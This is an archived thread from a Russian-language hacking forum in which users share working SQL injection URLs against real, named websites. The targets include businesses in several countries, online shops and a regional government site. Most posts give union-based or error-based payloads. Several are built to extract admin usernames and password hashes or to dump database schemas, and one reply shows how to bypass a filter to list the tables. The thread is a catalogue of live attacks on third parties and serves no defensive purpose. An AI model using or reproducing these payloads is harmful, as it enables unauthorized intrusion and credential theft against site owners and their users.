ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
17.09.2013, 17:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
pr=3
Сообщение от None
http://
www.hassalls.com.au
/auction.php?id=405+and(select 1 from(select count(*),concat((select concat(username,0x3a,password) from cmsc_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)+--+
|
|
|
|
18.09.2013, 02:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
country.ua
14к траффик
Сообщение от None
http://www.country.ua/message_send.php?to_user=4726/**/union/**/select/**/concat_ws(':',user(),version(),database()),2/**/--+
PS нужно авторизоваться
PSS хз где админка)
|
|
|
|
18.09.2013, 21:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
ej.ru
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//ej.ru/articles/?a=24&id=17+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+[/COLOR][/COLOR]
Сообщение от None
CY:4700||PR:5
25к траффа, пароли в бд есть, где админка хз))
|
|
|
|
19.09.2013, 00:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
тиц 190
Сообщение от None
http://www.kino-ukraina.com.ua/showwait.php?wait_id=271+union+select+1,2,user(),v ersion()+--+
root@localhost |
|
|
|
19.09.2013, 14:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от None
http://
www.distrilog.be
/pages/en/jobs.php?dis=detail&ID=-43'+union+select+1,2,3,concat_ws(0x3a,username,pas sword),5,6,7,8,9 from users limit 0,1+--+
|
|
|
|
20.09.2013, 18:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
http://murtet.ru/index.php?page=-norders'+union+select+version()+--+
|
|
|
|
21.09.2013, 08:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от None
http://
www.poniem.co.uk
/products/model.php?id=-14+union+select+1,2,version(),4,5,6,7,8,9 +--+
Сообщение от None
http://
www.hiredhandsmodels.com
/model.php?id=24+and+(substring(version(),1,1)=4)+--+
|
|
|
|
23.09.2013, 17:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
182660
Репутация:
324
|
|
Код:
Code:
http://addcs.vpn.by/view.php?bg=3C3A36&text=9a9a9a&link=ffffff&ip=ffffff&m=1&id=-800+union+select+1,2,3,4,admin_name,admin_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+csmon.amx_admin+limit+0,1+--+
почемуто не грузится с словом concat в запросе
хавиж и sqlmap не хотят дампить
пришлось руками крутить =( |
|
|
|
24.09.2013, 12:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Big Криуз (фильтр на вывод данных)
Код:
Code:
http://www.bigcruise.ru/company/?id=-40%27+union+select+1,2,version(),4,5,6+--+
Версия: 5.1.70-log
Строймат
Код:
Code:
http://www.stroymat.net/index.php?sectID=-6+union+select+1,2,3,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,5,6,7,8+--+
Магазин пиломатериалов (имеет много баз)
Код:
Code:
http://wood-group.ru/index.php?sectID=-179+union+select+1,2,3,4,5,6,7,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,9+--+
OPMPlus Москва
Код:
Code:
http://www.opmplus.ru/index.php?gID=-165+union+select+1,2,3,4,version%28%29,6,7,8,9+--+§ID=6
Версия: 5.1.52-log
DD2DDS (не могу обойти фильтр )
Код:
Code:
http://www.dds2dds.com/index.php?sect_id=12&site_num=1%27+union+select+1,2,3,4,5+--+
SALE.KHARKOV.UA
Код:
Code:
http://www.sale.kharkov.ua/advinfo.php?postid=146+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,version%28%29,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
Версия: 5.0.91-log (базу не смогу вытянуть из-за фильтрации)
БЛОК-ХАУС
Код:
Code:
http://www.blok-haus.ru/index.php?sectID=-1+union+select+1,version%28%29+--+
Версия: 5.1.52-log
Администрация Ейского Района
Код:
Code:
http://rayon.yeisk.su/trades/index.php?p_id=-466+union+select+1,2,3,4,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,6,7+--+
Lion-Expo.Ru
Код:
Code:
http://lion-expo.ru/index.php?sectID=781+union+select+1,version%28%29,3,4,5,6,7,8+--+
Версия: 5.5.33-cll-lve
ОАО "Стеклозавод" "НЕМАН" или как разбить все стёкла.
Код:
Code:
http://www.neman.by/ru/index.php?section_id=-125+union+select+%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29+--+
|
|
|
|
24.09.2013, 13:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Big Криуз (фильтр на вывод данных)
Код:
Code:
http://www.bigcruise.ru/company/?id=-40%27+union+select+1,2,version(),4,5,6+--+
Версия:
5.1.70-log Фильтр не "на вывод данных" - фильтр на from. То есть FROM, fRoMи т.д. не фильтруются.
Сообщение от None
www.bigcruise.ru/company/?id=-40'+union select+1,2,table_name,4,5,6+FROM+information_schem a.tables+where table_schema=database()+limit 0,1+--+
а вот и первая табдица: admins
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
